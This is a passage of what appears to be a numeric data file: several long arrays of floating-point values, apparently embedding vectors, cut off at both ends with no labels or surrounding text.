.044117764,0.0095283445,-0.013773201,-0.028485978,-0.033500146,0.0016016947,-0.020373859,-0.06220701,-0.028862443,0.027745802,-0.018839188,-0.0046093618,0.02636988,-0.0010284197,0.023146661,0.037915036,0.018390736,0.041030012,-0.021000337,-0.037941568,-0.025470583,-0.059610352,0.06450775,0.014110143,-0.0649884,0.010188409,-0.01644654,0.0401262,-0.055346243,0.042322915,-0.0081001455,0.019514529,0.0017046627,-0.03931973,-0.017661516,-0.018627826,0.00953276,0.08446854,0.005597605,0.04440169,-0.024767546,-0.0047341874,-0.00044116724,0.015807806,0.07574751,-0.03313592,-0.016485771,-0.037153687,0.009525625,-0.010042426,0.03804629,0.047201373,-0.012247874,-0.06896582,-0.02503817,0.042502876,-0.056605704,0.020507788,0.03253504,-0.0169916,0.00009716699,-0.04200829,-0.03502874,0.038887154,-0.090935096,-0.017762607,0.0081599085,0.037424024,0.019878523,-0.034508917,-0.000029456229,-0.0358868,0.011536734,0.0006217975,-0.063882016,-0.0039990204,0.024878768,0.022093173,-0.01888666,0.0049415673,0.027548272,-0.027656531,0.045708045,0.018153327,-0.05869001,0.033341967,-0.010303354,-0.00016266103,-0.030594906,0.037819806,-0.045764055,0.02788551,0.009779752,-0.018970186,-0.0868987,-0.0553945,-0.060262103,0.03787505,-0.06908062,0.031254318,-0.0012059308,0.022183694,-0.0627788,-0.004868586,0.029895796,-0.035301935,0.023169693,-0.055355642,-0.033881195,-0.06344955,0.009956775,0.008059127,0.045711238,-0.0014531049,0.0034908643,0.026908092,0.0021053324,0.028434586,0.038560342,0.008097918,-0.04649706,0.03558921,0.00799078,0.021980494,0.013061072,0.08595433,0.028518017,0.027395168,0.024872685,0.02652677,-0.01971076,0.03251729,-0.049063798,-0.015222629,-0.018473787,-0.02818746,-0.008840519,-0.015172013,-0.036730394,0.022393985,-0.018414434,-0.005947508,0.024358617,-0.038567662,-0.041647527,-0.009687372,0.02743806,-0.015207031,-0.042473566,-0.0154432,-0.0024259281,0.07772525,0.010622144,0.004099288,-0.068978935,0.042986415,0.041427683,0.059597116,0.009649752,-0.003919704,-0.018415576,0.010548137,-0.04515438,-0.08156075,-0.03466627,0.009766149,-0.0057867127,0.03822094,-0.00848865,0.005190392,0.010383239,-0.010763101,-0.044156328,-0.028804326,0.0519161,-0.011472471,-0.014750056,0.017988702,0.030279605,0.008421265,0.021664293,-0.021241147,-0.019523522,0.006813567,-0.06761533,-0.009109115,0.03660574,-0.007124069,0.02277499,-0.017268531,0.024141744,0.020126376,-0.025838062,0.0066614416,0.0041533,0.07206557,-0.0037413219,-0.008634813,-0.04898625,-0.005356074,-0.0018752135,0.046497826,-0.015382538,0.0291615,-0.032621995,0.009785436,0.014901057,-0.015456335,0.10046105,-0.033296663,0.013572262,-0.051626857,-0.034558054,-0.08078512,-0.0056291535,-0.019895036,0.02121462,-0.07388299,0.005802432,0.014953277,0.0029830541,-0.05117011,0.04196599,0.038442995,-0.03363697,0.07195604,-0.039019804,-0.02237121,-0.023578625,-0.04367579,0.0044621346,0.027842073,-0.012854097,0.08711055,0.0073682116,0.038616743,-0.011082819,-0.0059877164,-0.02140818,-0.027405655,-0.079196915,-0.014945398,-0.00546101],[0.007604107,-0.03463748,-0.18711938,-0.034578077,0.077981435,-0.065859,0.027317502,0.014825963,0.030340256,-0.06920792,-0.04445361,0.054296672,0.0141869765,-0.022306524,0.059983667,-0.06611746,0.038409185,-0.042107996,-0.039044783,0.024517424,-0.0021282202,-0.070265085,0.010510601,-0.024366947,0.08844694,0.014789051,0.010691956,0.009689036,-0.014590628,0.017502598,-0.003550008,-0.00027944162,-0.017788181,0.010060124,-0.043483656,-0.076019146,0.011836731,-0.027500082,-0.019205961,-0.007169848,0.035832614,0.011250116,-0.016173918,-0.052439384,0.013525254,-0.02608831,0.040456295,0.022319075,0.03230719,-0.10702321,0.047971744,-0.04261797,-0.0021291405,-0.021380339,0.087899074,0.009410512,0.017927336,-0.0011477022,0.014192121,-0.043215293,0.088724695,0.061253108,0.013528297,0.06417349,0.04185223,-0.054961644,-0.035632987,0.07475664,0.0063044038,-0.03638927,0.048215833,0.00494006,-0.014983195,-0.015681705,-0.01749875,0.015112631,-0.050825562,-0.08513511,0.0294033,0.024744898,0.0021184077,-0.030845713,0.0854857,-0.020250738,0.009013002,-0.000025476133,-0.020615319,-0.01686291,-0.037291847,0.040818326,0.01868902,-0.030232554,0.028226117,0.0541044,-0.087022044,0.007906448,0.0017476348,0.02029046,0.0117448615,-0.018708777,0.0021018058,-0.021003017,0.024590028,-0.0075145573,-0.015053499,0.09292196,0.037895754,0.0035171676,0.039680067,0.021508172,0.016946787,0.048809666,0.031099059,0.019534735,0.0042414735,-0.05848197,0.00965692,-0.03518056,-0.019608293,0.039967876,-0.043878935,-0.030726146,0.0034549062,0.020087473,0.05560485,0.030728413,-0.02039392,0.005385752,0.004227476,-0.06751817,0.008616742,-0.02619923,-0.042329222,0.0092561925,0.04082908,0.07564277,-0.04243535,-0.06135129,0.019551968,-0.015107416,0.0052592866,0.0055227494,0.014379454,-0.06740856,-0.0061995215,0.009169524,-0.0034697296,-0.026473729,-0.04722492,0.06292625,-0.058886632,0.024659928,0.006996555,0.04348892,0.04377602,-0.020917831,-0.011800742,0.0070688794,-0.0036783984,0.035205767,0.029705891,0.00019134572,-0.03276621,0.05737372,0.03114618,-0.049364775,0.004484547,0.023088228,0.001602085,0.003477441,-0.037638243,-0.04479037,-0.0124628935,-0.03475733,-0.0018580243,0.010014733,0.0551459,-0.05383568,0.0147418585,-0.020785637,0.013518953,-0.07826704,0.053314473,0.022019193,-0.04144295,-0.0019883732,-0.011433395,-0.048846148,-0.015818154,-0.034470137,0.027376032,0.019680027,-0.039806288,0.005889553,-0.059784625,-0.040387448,0.017492529,-0.009075642,0.0042462037,-0.02666028,-0.0077485368,0.008663254,-0.038067237,-0.00007795961,-0.048104227,0.040174294,-0.019881228,0.016718702,-0.024912423,0.043587785,0.07216752,-0.04152914,-0.009577686,-0.016425624,-0.053313393,-0.03245613,-0.008739329,-0.002127672,-0.047832888,-0.00032705953,0.02768892,0.009450406,0.030454477,-0.012993272,0.0073769954,0.011229156,-0.03134028,0.00022712054,-0.00095374545,-0.004345239,-0.023975478,-0.08635224,0.009805828,0.036085747,-0.019078655,0.024458027,-0.011962473,0.08512799,-0.030183021,0.015286336,0.011301751,0.033107847,-0.014305255,0.03743635,-0.051340073,0.035787977,-0.031017957,-0.022611793,-0.027305124,-0.00518845,0.017598568,-0.01716106,0.036307115,0.012948818,0.09274023,-0.098296024,-0.043517742,0.032180745,-0.0028435239,-0.009714061,0.034344174,0.012466313,-0.006834944,-0.050937716,0.0177674,-0.048383497,-0.019250475,0.038793776,0.046084724,0.016859269,-0.015052343,0.0305209,-0.00026321306,0.073711805,-0.01691931,-0.011239143,0.03043073,-0.008210497,-0.0076363157,-0.009735816,-0.05493942,-0.010439582,-0.006625279,0.015131202,-0.00055071665,-0.03208904,0.019253584,-0.020701092,0.0037627434,-0.032152735,0.0906762,-0.035131652,-0.049879637,0.044829287,-0.02171865,-0.020993767,0.04129837,-0.006429699,-0.0032686878,-0.0073459493,0.08251874,0.009890338,0.03416882,0.03682855,-0.012613079,-0.0021354458,0.051626112,0.0069088535,-0.007358323,-0.031148428,-0.038323555,0.01683868,-0.018735783,0.015863445,-0.04735141,0.02383945,0.042363968,-0.007213626,-0.0032081264,-0.0024832492,-0.027891744,-0.011807362,0.025331205,-0.014357081,-0.027267005,0.03845479,-0.03535745,0.06896903,0.0043737413,-0.034641072,-0.013871624,-0.016990488,0.047552984,-0.03896481,0.0022263455,0.04911046,-0.0056635463,0.02427973,-0.04473249,0.058406077,0.015816543,-0.0313456,0.0041729794,0.015509902,-0.03402358,0.008288306,-0.03357364,-0.032556985,0.020566223,0.0363892,-0.06626346,0.041498173,-0.025718162,-0.009849096,-0.01281904,0.014412474,0.034584157,0.014427759,-0.008582249,-0.008724209,0.044653848,0.006307597,0.02346974,0.002947979,0.009086447,0.06847211,0.041039314,-0.005909535,-0.0007299933,0.008678828,0.0009096401,-0.02578996,0.010496307,0.012586251,-0.037070002,0.021170298,-0.0654929,0.00940075,-0.019358184,0.04011707,0.007619003,-0.045456015,-0.02442613,0.028422046,0.028511839,-0.0046189064,0.043357193,0.0035721983,-0.00028673396,0.0626874,-0.011871206,-0.01957208,-0.0010053215,0.0012448025,0.024550822,-0.016577926,0.002324887,0.009855825,0.046384033,0.073122196,-0.05823944,-0.06967658,0.04394587,0.03503463,-0.009448496,-0.006475866,-0.030779121,-0.028980074,0.073590495,-0.008799975,0.073935,0.0032977443,-0.020709088,-0.033887655,-0.009357914,-0.0117008425,0.06372283,0.038386077,-0.025093352,-0.013330534,0.02121018,0.0193043,0.02403572,-0.02981568,0.0039024153,0.00007311148,0.01624381,0.028658276,0.010884164,-0.06911868,0.002396042,0.017500527,0.04017268,-0.043774676,-0.012184095,-0.03444033,-0.0073877103,0.044307526,0.009885735,0.005165596,0.07316133,0.0108875865,-0.07936726,-0.0322337,0.012835144,0.081252314,0.09046399,-0.06069354,-0.027710347,-0.007911337,-0.020930316,0.00456189,0.02949347,0.0027705326,0.12476758,-0.015632588,0.024309885,-0.017774915,-0.008267177,-0.010532223,0.035862498,0.016128525,-0.054731537,0.0051674703,0.010520678,0.02189599,-0.04065367,-0.02403418,0.058391333,0.107824825,-0.07788399,-0.031679127,0.030543437,-0.004700169,0.032136466,0.017741904,-0.02295772,0.018629294,0.011931313,0.053251024,0.025187802,-0.055217408,-0.032152947,-0.075803064,-0.0076962663,0.0009883299,0.026243664,-0.04018256,-0.0033270558,-0.023687167,-0.013019925,0.031352114,-0.036202922,0.0032936828,-0.009936111,-0.018161954,-0.02416661,0.00086668,0.015006709,-0.014713656,0.049060237,0.015356763,-0.011042013,0.03153209,-0.009504161,-0.011432846,0.048304394,-0.050781757,-0.028740093,-0.051360015,0.016007291,0.0043695415,0.011270702,0.0073618507,0.046010714,-0.04330337,0.023560066,0.02179247,-0.08345828,0.004666258,0.025630282,-0.035376202,-0.019208284,-0.012374816,-0.047952946,0.0122781275,-0.0063959216,0.016307836,0.017453933,0.010739281,0.004758498,0.0038134332,-0.049185693,0.01653326,0.04487109,-0.01681783,-0.04297953,0.036423873,0.013445505,-0.008407961,0.037666496,0.026552057,-0.0012704378,-0.029511964,0.008970384,0.0032207945,-0.018936444,0.0824947,-0.006493114,-0.005054385,0.044183914,-0.06564655,-0.002580388,-0.03993918,-0.013092329,0.021368658,0.037521202,-0.010716009,-0.04470962,-0.04148224,-0.05024826,0.012010927,0.062156606,0.037744697,0.024706574,-0.060669966,-0.03379822,0.05336575,0.003049965,0.05552899,-0.02080208,-0.039281335,-0.048664104,-0.0064247954,0.02758804,0.016930802,0.033686876,0.009125634,-0.054631624,-0.02703757,0.03489578,-0.077824265,0.034097884,0.040274855,-0.0016276202,-0.026665922,-0.009834503,-0.045731798,0.07729714,-0.044804435,-0.016727734,0.029335584,-0.0077410643,0.013996903,0.02726337,0.05157601,-0.048465725,-0.00833709,-0.019660283,-0.025094619,0.00943751,0.00015187205,0.015929356,0.0024133413,0.018154422,0.03646088,-0.010536361,-0.00027750758,0.007029214,-0.032408893,-0.0029708347,-0.023325823,-0.006052725,-0.030166604,0.023050638,-0.032718763,0.046904396,0.007864033,0.008242208,-0.031476036,-0.03130727,-0.04392341,0.0398034,-0.031745262,0.04113434,-0.0021695904,0.0037327851,-0.055639353,-0.021109752,0.026547676,-0.035465583,0.039293487,-0.051914312,-0.07806026,-0.10186477,0.0028519377,0.015602266,0.022792488,0.0019220726,0.05703845,0.06680227,0.008056227,-0.031054813,0.0022836612,0.027156977,-0.03395195,0.011279414,0.02467055,0.05474156,0.009735579,0.05505369,0.06185807,0.018035151,-0.018749656,0.023758937,-0.03139789,0.037892684,-0.009491526,-0.09410482,-0.051614795,0.0055614575,-0.022519737,-0.011791663,-0.0008493604,0.036960468,-0.03655839,-0.0073232553,0.011979762,-0.048868045,-0.018048551,-0.007336208,0.03137618,0.004086085,-0.05424491,-0.007858972,0.0038978274,0.08948141,0.037698753,-0.044456385,-0.0071059256,0.02344225,-0.022700373,0.015017802,-0.03632669,0.042322278,-0.065393604,0.013355062,-0.04722388,-0.02412317,-0.011913631,0.01121956,0.021708809,0.014338863,-0.02267414,-0.013477888,0.01730925,0.008273036,-0.021486903,-0.054902837,0.07590955,-0.0005693753,0.0117646465,0.0003221342,0.032322817,0.010836691,0.008241485,0.017702395,0.02449304,-0.019023705,-0.005735363,-0.03352252,0.021193344,0.0009405909,0.04853602,-0.0011917005,0.041012377,0.0022028068,-0.028891267,0.055739414,0.003039238,0.04294113,-0.0058263387,-0.04811246,-0.036963195,0.015205362,0.054647837,0.013887889,-0.0017022187,0.014782275,-0.02540529,0.016484994,-0.01151076,-0.033448853,0.03726604,0.015149949,-0.0037743647,-0.021592798,-0.015619867,-0.047056228,-0.02945831,-0.022636518,0.018628025,-0.024018148,0.04754733,0.024670223,0.029350303,0.0077817445,0.048487917,-0.008941099,-0.002714588,0.046670433,0.020273557,-0.015068193,0.0190557,-0.037194993,-0.03302819,0.018047486,0.024892313,0.080970876,0.034532525,0.06069566,-0.027710931,0.003451835,0.0018434712,-0.021259658,-0.075858824,-0.010906291,-0.05025963],[0.016032616,0.04315081,-0.16030245,-0.08471714,0.043280263,-0.063395776,0.00076526636,-0.0035988765,0.027035004,-0.015815664,-0.033487845,0.07542234,0.027337646,-0.01779958,0.019063676,-0.029810749,0.036946237,-0.02057408,-0.0033319693,-0.001579955,0.010897046,-0.042896573,-0.019021798,-0.06258362,0.096399456,0.038477182,-0.003183936,0.029636355,-0.037098642,0.011954902,0.090262726,-0.016696138,-0.049733248,0.021211596,-0.0284273,-0.07946566,0.027331542,-0.052615028,-0.07049524,0.016164672,0.014979389,-0.02157248,0.019652372,-0.03819492,0.01972127,-0.020670896,0.0025560912,-0.010959674,0.075784825,-0.09805866,-0.03746277,-0.030150991,-0.034784403,-0.03353863,0.07236463,-0.028320204,0.006837214,0.044657473,-0.010465629,-0.074927226,0.031356785,0.04408733,-0.020406095,0.063578285,0.019098727,0.0078084553,-0.016922578,0.060194615,0.03115505,-0.0013800288,0.03436655,0.0027442893,0.013412128,-0.028374359,0.022113146,0.013482564,-0.0437169,-0.0726423,0.013113494,0.007831058,0.04167128,-0.012400657,0.07918206,-0.032774583,0.04417492,0.032888316,-0.03204826,-0.017046351,-0.030703057,0.052553594,0.0057441373,0.01758933,0.007505392,0.0512564,-0.08482227,-0.0031603756,0.00806342,0.022392336,-0.034948047,0.004354989,-0.035641957,0.03876218,0.017719802,0.019164996,-0.022322943,0.073076695,0.013693818,0.0015845863,0.01749852,0.045432482,0.018679518,0.028174376,-0.014270034,-0.044220462,0.029817553,-0.04061258,0.06875913,-0.007909769,0.011711015,0.030706692,-0.000808307,-0.054318707,0.0061002467,0.032836232,0.063251495,0.06289836,-0.05603146,0.01403831,-0.00823114,-0.05714477,-0.02467108,0.004015642,-0.031812306,-0.0076591633,0.0070136418,0.05998071,-0.039399635,-0.07601334,0.026280008,-0.058699016,-0.006383769,0.029486755,-0.011655977,-0.024355432,-0.009844799,0.004320796,0.04425034,-0.029158536,-0.04826581,0.032363616,-0.022139577,0.0313862,-0.030580861,0.03098634,0.019328991,-0.03479168,-0.0076048453,-0.0055473656,-0.021222422,0.06530387,0.017510684,0.02966036,-0.06447318,0.0679062,0.021798404,-0.05168266,0.0030480705,0.08969993,0.0024178803,0.008661168,0.008725063,-0.028733512,-0.016980978,0.008523468,0.029807758,0.02141311,-0.007379843,-0.048191488,0.04115419,-0.018934762,0.02310482,-0.066727124,0.024307458,0.0047795703,-0.032423206,0.01471243,0.058046974,-0.04047328,-0.022293113,-0.033785056,0.010604587,0.009919183,-0.051910374,-0.017643113,-0.040016357,-0.037127018,0.06615011,0.004081088,0.053415533,-0.0131383855,-0.017385699,0.02350294,-0.028332226,0.0026645195,-0.08110755,0.04153926,-0.012593745,0.025267461,-0.038301583,0.0473946,0.09709479,-0.0071872603,-0.00088286266,-0.0014120997,-0.0061113588,-0.0012749331,0.01328647,-0.028496962,-0.08077282,-0.0024546701,0.0432168,-0.01400451,0.040696748,-0.030269869,0.01356134,-0.033630647,-0.023530876,0.012067537,-0.013032777,-0.020016411,-0.026811935,-0.055348646,0.059126925,0.044505052,0.04608086,0.005616786,-0.012970891,0.09254732,0.006328553,0.07298803,-0.009123246,0.06449187,-0.015043782,0.01102382,-0.07541395,0.0013281984,-0.019083418,-0.020934155,-0.025179397,0.032944884,0.020679597,0.013737752,0.037187327,-0.008004872,0.044408303,-0.05716693,-0.030384539,0.012276996,-0.02383536,-0.024439005,0.020773603,-0.009105588,-0.017682191,-0.056339625,-0.031386733,-0.058529228,-0.035137128,0.00007801449,0.041253217,0.0065159933,0.017716018,0.016093578,0.031241886,0.08134853,0.014985233,-0.018000256,0.03327407,-0.039860923,-0.027190048,-0.019206291,-0.06495933,-0.016487762,-0.0022738245,-0.010138907,0.012359186,-0.009482151,0.049634065,-0.027039345,-0.00055949076,-0.012742263,0.037061155,-0.05931825,-0.072960086,0.012718981,-0.008313,-0.006655449,0.007397027,-0.018183937,0.004022946,0.020721087,0.046019293,-0.0131933605,0.06124028,0.02494968,0.011735432,-0.018938174,0.02035662,0.0067311954,0.021220362,-0.0016636366,-0.008420361,0.037912663,0.005992099,0.031976365,-0.039448522,0.05336262,0.015905308,0.006056235,-0.0004037717,-0.003783738,-0.028567366,-0.047870673,-0.014058263,-0.014628526,-0.0010501662,0.047105815,-0.040740114,0.06603661,-0.024944592,-0.036692053,-0.0009568212,0.0055905124,0.014320919,-0.030383939,0.0032085702,0.009187686,0.016904525,0.019881157,0.0075295703,0.041751977,-0.014701921,-0.032514356,-0.0017923046,0.013503621,0.005690203,-0.0025705134,-0.02585274,0.010727477,0.031133512,0.027360557,-0.024537966,0.008414955,0.01247124,-0.015283086,-0.016489437,-0.0038999137,0.038185287,0.048852216,0.011119903,-0.0037232426,0.044315927,0.001782606,0.013179867,0.025215043,0.008887094,0.034189563,0.031588838,0.03219873,-0.013839121,-0.007008294,0.023197256,0.010912976,0.029103639,-0.007401793,-0.028835028,0.049533512,-0.07489486,0.017722573,-0.017692901,0.013464627,-0.0064353393,-0.08711467,0.007416138,0.0383982,0.010731915,-0.012990408,0.04289075,0.0077846926,-0.031617988,0.05957607,0.011813778,-0.06485873,-0.0304496,-0.01670744,0.0382429,-0.0016283644,0.049461577,-0.01986602,0.0210276,0.01730184,-0.02833953,-0.053904787,0.046995435,-0.0118501745,0.0068912283,0.015252254,0.007919769,-0.031220417,0.057598222,0.008945162,0.043591384,0.045769468,-0.012139651,-0.026413556,0.04725497,0.043404423,0.06931748,0.043356918,-0.010856699,-0.04669167,-0.018880019,0.026427848,0.017657092,-0.013089449,-0.0032200827,0.049989697,0.024593838,0.01764882,0.0023361365,-0.08302828,-0.0026291995,0.05820938,0.013514967,-0.021062488,0.01853564,-0.030713322,0.0065757465,0.0010306217,-0.011405564,0.03197919,0.033049375,-0.03775389,-0.054728884,-0.053131353,-0.027730517,0.0882939,0.08091802,-0.070984036,-0.05412129,0.04160013,0.018832047,0.0048456048,0.02215002,0.01581633,0.1258529,0.014107174,0.0050006756,-0.015034095,0.006941177,-0.0013721463,0.041977163,0.02187361,-0.051276494,-0.00958372,0.029373772,0.017849607,-0.024447473,-0.047833547,0.046973202,0.067259334,-0.033980515,-0.033165306,0.02268676,-0.013359214,0.028670223,0.0068149627,-0.041523248,0.032934416,-0.0019250697,0.067527115,0.02464801,-0.036326796,-0.060464017,-0.10548177,-0.03489893,0.03415516,-0.013963075,-0.00818424,-0.018714985,-0.00829361,-0.0030219634,-0.019655611,0.015062426,0.047285467,0.01806833,-0.029732062,-0.011563326,0.0033367495,0.031540066,-0.028584102,0.034855112,0.012531074,-0.03197884,0.03533476,0.005170301,-0.048358724,0.06959556,-0.020118443,-0.019146059,-0.0012853652,0.043488152,-0.04260199,-0.0063448264,-0.02735059,0.0732334,-0.09660019,0.031928014,-0.025691532,-0.032844886,0.023046862,-0.022473263,0.0017591547,0.0039003044,0.00079002505,-0.05260132,-0.012632675,-0.0014299562,-0.022456845,-0.005687309,-0.042580936,0.030703198,0.036373228,-0.049201846,0.00767574,0.013091492,-0.011695147,-0.02555376,0.056825005,0.018302906,0.017372508,-0.017771825,0.0027140593,0.0061594374,0.046204533,0.019055046,0.020898595,-0.014908517,0.067142755,-0.015621807,-0.053196378,0.013447421,-0.06848937,0.023965336,-0.0026797145,0.029898396,-0.009547084,-0.020097231,-0.0048325076,-0.047110092,-0.015546771,-0.010664092,-0.025013197,0.019742932,0.0017971338,0.026767997,-0.06268201,0.013016871,0.056642976,0.006329578,0.046271294,0.023627978,-0.019519163,-0.08385921,-0.03902098,-0.006952384,0.016636126,0.020926947,0.021033345,-0.06822109,-0.013932026,0.039808363,-0.030072952,0.00092134316,0.015715813,-0.0017388623,-0.0096032275,-0.050284065,-0.051571146,0.04450783,-0.06546902,-0.041344825,0.02735203,0.013214741,-0.0006671783,-0.0020826731,0.053189274,-0.003275231,-0.01903339,-0.00378079,-0.05149226,-0.032041065,-0.0045109675,0.017522246,-0.0033276924,0.008053171,0.021545377,-0.037284788,0.030045163,0.0024138093,-0.055021573,0.052725237,0.010420022,-0.009686046,-0.010202003,0.009828728,0.0064913966,0.011570025,0.038584467,-0.050102163,-0.0049650273,0.010373603,-0.050349973,0.0012822623,0.011227911,0.027206203,-0.016985111,0.012204053,-0.022235572,-0.050421074,0.019061109,-0.03306572,0.016119871,-0.07183877,-0.06424193,-0.06497098,0.018904125,-0.00079800875,-0.0132573815,-0.011533726,0.038243685,0.08800783,-0.023539983,-0.01364058,0.014118092,0.043072242,-0.018456915,-0.001297526,0.064716704,0.014883372,0.02367292,0.05665527,0.077156335,0.004862031,0.03077989,0.04544717,-0.022896916,0.05380446,-0.0422317,-0.08474124,-0.011171423,-0.019448014,-0.03164551,-0.032609656,-0.04324844,0.0026373346,-0.032507036,0.005336333,-0.028319605,-0.05488617,-0.012431895,0.010066421,0.0588742,-0.020600542,0.032675184,0.01672014,-0.013807098,0.060324475,0.054621715,-0.03223063,0.014153861,0.009160137,0.013301481,0.039415207,-0.017282445,0.004125753,-0.08644443,0.03427999,0.0056344494,-0.044015273,-0.02480849,-0.010495114,-0.013743181,-0.045439787,0.014207897,-0.033326842,0.03772877,-0.004923541,0.00037944532,-0.07172555,0.064538,-0.024087325,-0.009716964,-0.012587784,0.035547666,0.016466687,0.023277983,0.007401116,0.0055389786,-0.023989603,-0.0022365057,-0.039419375,-0.014703891,-0.016654635,0.039418507,-0.017885251,0.0457884,0.014044102,0.013241386,0.03822622,0.025034614,0.04262488,-0.005327392,-0.0558597,-0.013549997,-0.019595731,0.03893195,0.005992775,-0.027723102,-0.014244161,-0.017774854,-0.011556711,-0.065228604,-0.044490416,0.027719157,0.03192917,-0.009126393,-0.033111285,-0.00673047,-0.036050133,0.00033871346,-0.042728517,-0.00019517043,-0.033842914,0.013838646,0.028760161,0.0040752464,-0.009169378,0.057204418,0.01969884,-0.039437905,0.054417606,0.024105027,-0.04439234,0.025470985,-0.017072883,-0.025634117,0.012704886,0.028041942,0.08146781,0.004425344,-0.0037354496,-0.04719718,0.024509314,-0.008693485,-0.019064765,-0.054015532,0.003947577,-0.03407871],[-0.049053777,0.022641283,-0.17636275,-0.04329899,0.09048598,-0.077894986,0.013321102,-0.024781,0.017323792,-0.03492958,-0.011022398,0.009814998,0.097696625,0.008692685,0.052481696,-0.040595755,-0.0049088523,-0.0127604,-0.01667306,0.04116196,0.012130695,-0.04695785,0.028943716,-0.058773983,0.08588984,0.058923192,0.011941318,0.0068128835,-0.026694229,-0.025271561,0.008238432,0.02462086,-0.029886601,0.00083711144,-0.012308173,-0.06408574,0.034396235,-0.01706184,-0.07014089,-0.013924533,0.014302594,-0.003047439,-0.00728246,-0.04837277,0.0038966998,-0.030485392,0.030675655,-0.02999554,0.050479956,-0.09569693,0.006233044,-0.04347968,-0.029024173,-0.04502219,0.045116097,0.028336652,-0.0057186615,-0.013047918,-0.036692344,-0.047557384,0.070624255,0.045013253,0.054709572,0.103428565,0.061703637,-0.019411013,-0.031655118,0.07903879,0.015270993,-0.016377235,0.03675339,-0.029473104,0.038467806,0.013898777,0.008299724,0.023602044,-0.049831025,-0.03779172,-0.014906071,0.013733009,0.06345676,-0.01628406,0.08811609,-0.01793464,0.023640754,-0.041592095,-0.04090291,-0.046205964,-0.03293766,0.03839959,0.00349287,-0.004478523,0.015034388,0.019411642,-0.06341855,0.023291456,-0.021325763,0.019935852,-0.00013513317,-0.032973353,-0.046010744,0.024372093,-0.022199204,-0.011863398,0.013726668,0.055231307,0.016588563,0.03740272,0.014631752,-0.007047599,-0.005397276,0.05173746,-0.0027580487,0.022634579,0.013002971,-0.06936568,0.047732107,-0.0068098637,-0.005002912,0.04466573,0.010580165,-0.030832004,0.01648182,0.046510927,0.03762542,0.05193055,-0.04704617,0.0116889095,-0.006046371,-0.05398347,-0.015255405,-0.00742105,-0.036277443,-0.017603291,-0.005658934,0.05432884,-0.09330326,-0.048018724,0.025659949,-0.019648507,0.004297303,0.0362637,0.0074507445,-0.04222853,-0.008528308,-0.028573807,0.01239703,-0.010162408,-0.03127927,0.035721153,-0.0014960495,0.02692001,-0.0052634696,0.043486353,0.037852976,-0.0061823484,-0.012641836,0.016676942,-0.018908456,0.013504974,0.017757254,0.011219416,-0.07405479,0.03884132,0.018165015,-0.046147324,0.038985163,0.0312822,0.0067683677,0.009546526,-0.051297467,-0.059555445,-0.02682805,0.030968238,0.01414147,-0.014655578,0.03427322,-0.048876297,0.01614555,-0.025443869,0.040811837,-0.04621296,0.027704686,0.023071997,-0.04851156,0.035030223,-0.0019206979,-0.0359194,-0.012955081,-0.039220043,0.024418505,0.035321977,-0.013261083,0.012894211,-0.007958427,-0.024005253,0.017514853,-0.021301242,0.014949293,-0.017944543,-0.02155748,0.010796272,-0.025593862,0.0089157345,-0.053711534,0.023090258,-0.00026611844,0.032076847,0.018571176,-0.006533507,0.09073275,-0.031029878,-0.029759714,-0.018186053,0.006697037,0.0021400962,0.018104618,-0.045573965,-0.038087074,-0.024466984,0.032726467,0.012692637,0.032449428,-0.018147938,0.014334587,0.02193201,-0.028050616,0.0032058482,0.00055897306,-0.022516998,0.0138696795,-0.049790036,0.027053287,0.024835581,0.0018931912,0.015184724,0.004619416,0.077339575,0.009840514,0.040696222,0.005961352,0.025008336,-0.0057773967,-0.00061994605,-0.040480375,-0.0028810163,-0.0074521457,0.007758007,-0.007891042,0.04431881,0.01929032,-0.027859079,0.012275545,0.015298584,0.057915654,-0.035150137,-0.011356618,0.02038677,0.00034770457,-0.008418059,0.018893769,0.013641569,0.025357796,-0.028468428,0.018061731,-0.053877685,-0.04815417,0.03466219,0.027726451,0.01696719,0.035063487,0.015884979,0.012326001,0.06801482,-0.05238674,0.042009044,0.012580443,-0.035314858,0.0050477413,0.040378947,-0.05081826,-0.03457153,-0.002964019,0.019217368,-0.013582523,0.03773388,0.020879457,0.01669633,0.0006212175,0.013511582,0.064317785,-0.009873505,-0.06241931,0.029290305,-0.032055266,-0.018956661,0.047624707,-0.030980714,0.010294236,-0.00072241924,0.048591025,0.014610337,0.10282706,0.072390646,0.011998993,0.0044672475,0.03037757,0.013014923,0.006938411,0.00788369,-0.02878693,0.011949574,-0.060256667,0.05818515,-0.037803907,0.045617417,0.06700943,0.0042775874,-0.008618673,-0.0313837,-0.017313825,-0.031229297,-0.024898617,0.005683088,0.006498498,0.071981624,-0.04351358,0.02063823,0.021428052,-0.043532357,0.01012134,0.013550631,0.036994807,-0.020543102,-0.009629856,0.019607017,0.019595949,0.025915679,-0.0031290748,0.05800301,0.01797621,-0.025526375,-0.012096897,-0.035118967,-0.031395655,0.0038278662,0.018901441,0.0027518524,0.004828968,0.029656623,-0.06155968,0.015100541,0.0035162533,0.029959898,0.014286156,-0.02006383,0.021308072,0.049504247,-0.019929541,0.018681651,0.042355396,-0.0027042085,0.023345578,0.04605157,0.030271595,0.038116023,0.040059496,0.025728464,0.021217404,0.018028209,0.016867343,-0.00046186708,0.0008734526,-0.016486825,0.002210489,0.0046665664,-0.07429071,-0.026981639,0.00021350708,-0.00771153,0.034183085,0.010131246,0.018015495,0.022951936,0.027404191,0.019542567,0.009855754,-0.011823362,0.011219746,0.043821443,-0.016346395,-0.05471015,-0.030304011,0.013275409,0.03910891,-0.006522287,0.04328417,-0.020314967,0.029083285,0.074606314,-0.050016064,-0.09787868,0.017428936,-0.028114598,0.040364042,-0.01410797,-0.012777788,-0.026283538,0.04436059,-0.0008235639,0.095045164,0.0054376465,-0.014509984,-0.03267617,0.0048432825,0.0129822055,0.07931712,0.030612983,-0.022918688,-0.020942952,-0.0072390307,0.054212954,0.022673357,0.0010784423,0.02292266,0.004716697,-0.010749029,0.054474846,0.010791902,-0.07444117,-0.01984855,0.034119356,0.044033293,-0.020067655,-0.022196053,-0.018516937,0.044361494,0.012275961,0.040436238,0.029376702,0.02897473,-0.015042474,-0.057808984,-0.07149324,-0.024038283,0.095334195,0.09119584,-0.061292943,-0.05307009,-0.013653389,0.011145914,0.01019575,0.004074606,0.038281646,0.10563575,0.013338363,0.011807159,-0.020822795,-0.014549458,-0.036999464,0.030740483,-0.0045760376,-0.026394445,-0.012896459,0.018756924,0.017540328,-0.0125658205,-0.0135553945,0.07828819,0.0904316,-0.050300077,-0.032095216,0.030103803,-0.030348385,0.0030877402,-0.009006247,0.017083578,0.041865878,0.015179335,0.021044802,0.028431257,-0.031702653,-0.07306508,-0.06878703,-0.041479502,0.039386205,0.032907136,-0.01971382,0.0012785689,-0.01747402,-0.016253583,-0.018284494